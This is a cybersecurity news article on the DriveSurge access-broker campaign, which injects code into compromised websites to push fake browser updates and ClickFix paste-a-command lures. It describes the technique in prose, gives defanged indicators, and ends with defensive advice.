Threat actors have compromised thousands of websites to engineer industrialized ClickFix and FakeUpdate campaigns in an organized operation aimed at selling initial access to systems. The campaign targets Windows and macOS environments and represents a mature cybercriminal ecosystem that operated undetected for nearly a year.
Researchers at Silent Push discovered the activity, which they refer to as DriveSurge. The operation appears to function as an initial access broker (IAB), utilizing a pay-per-install (PPI) model to supply downstream threat actors with high-quality leads.
The operation's primary mechanism is a traffic distribution system (TDS), specifically leveraging an open-source variant called zTDS. Available publicly since at least 2015, zTDS acts as the foundational engine for this activity. When a user visits a compromised website, the system uses zTDS domains to route traffic toward ClickFix and FakeUpdate pages. According to the research report, DriveSurge silently redirects visitors to malicious code without the knowledge of the site owners or the affected users.
Targeted code delivery
The infrastructure supporting DriveSurge is extensive. It includes code repositories, PowerShell downloaders, staging servers, and multiple fallback domains configured to maintain resiliency if parts of the network are taken offline. The threat actors evade detection using obfuscated JavaScript encoded in Base64, dynamic URL construction, and failover logic to retrieve unauthorized code.
A notable aspect of the operation involves an obfuscated script hosted on their infrastructure that performs extensive environment profiling. The malicious software collects information about the target system, identifies operating system characteristics, communicates with endpoints controlled by the threat actor, and dynamically constructs code based on the platform.
Waseem Ahmed, head of engineering for Secure.com, notes that while ClickFix and fake-update prompts are established methods for gaining initial access, DriveSurge stands out due to its scale and organizational structure. He describes the operation as a group operating quietly across thousands of compromised but legitimate sites, functioning less like direct intruders and more like an enterprise selling access to other unauthorized parties.
Silent Push emphasizes the sophisticated nature of the campaign, noting that one of the associated malicious websites has been active since at least September 2025, though researchers only identified the broader DriveSurge operation this past February. The report attributes the operation's significance not just to its volume, but to the complexity of its infrastructure, the breadth of its targets, and the fact that it operated largely undetected until now.
How the campaign operates
The sequence begins when a user visits a legitimate website—such as a business, professional services firm, or local organization—that has experienced unauthorized access. Hidden code injected by DriveSurge routes the visitor through the zTDS layer, which profiles the environment and determines the next step.
The affected party typically encounters one of two scenarios. The first is a FakeUpdate browser prompt, designed to impersonate major browsers including Google Chrome, Mozilla Firefox, Microsoft Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, and UC Browser. The prompt encourages the user to download a file presented as a legitimate update, which actually contains malicious software.
The second scenario involves a ClickFix social engineering technique. The user sees a simulated error message instructing them to copy and paste a "fix" into their terminal or PowerShell window. This command installs unauthorized software directly onto the system.
Silent Push researchers documented examples of both methods. They observed a FakeUpdate campaign on the compromised site jclforwarding[.]com, where the domain check[.]first-node[.]rocks served a simulated Mozilla Firefox update page. Clicking the prompt triggered a zip file download containing several DLLs and an executable named "Browser Update[.]exe." The researchers also observed a ClickFix sequence attempting to retrieve malicious code from IP 91.92.240[.]127, an address previously flagged on Silent Push's Bulletproof Hosting Indicators of Future Attack (IOFA) feeds.
Addressing ClickFix campaigns
DriveSurge combines industrialized IAB operations with ClickFix techniques, successfully bypassing many automated browser protections by convincing users to execute commands manually. The campaign also demonstrates the increasing frequency of macOS targeting, a platform historically subjected to fewer initial access attempts of this kind than Windows systems.
To strengthen defenses, organizations should complement automated protections by addressing these convincing social engineering tactics. Jason Soroko, senior fellow at Sectigo, recommends that security teams ingest real-time threat intelligence feeds to block associated domains. He also advises prioritizing user education so employees can recognize simulated error prompts and know never to paste unfamiliar commands into a system dialog.
Organizations can also instruct security teams to monitor for specific operational indicators. According to Silent Push, these include:
Unexpected outbound traffic to newly registered or low-reputation domains.
Browser update prompts originating from non-vendor domains.
Users executing Terminal, PowerShell, or shell commands copied directly from websites.
Detecting suspicious JavaScript injections on externally facing web servers, alongside monitoring indicators of compromise associated with zTDS infrastructure and ClickFix delivery chains, can further assist in identifying and mitigating this activity.
About the author
Elizabeth Montalbano is a contributing writer, freelance editor, and journalist with 30 years of professional experience and a master's degree from Arizona State University. Her expertise spans enterprise technology, cybersecurity, business, and culture. She has worked as a full-time journalist in Phoenix, San Francisco, and New York City, specializing in news coverage and analysis of the cybersecurity situation. She currently resides in Portugal, where she enjoys surfing, hiking, cultivating plants, and performing as a musician.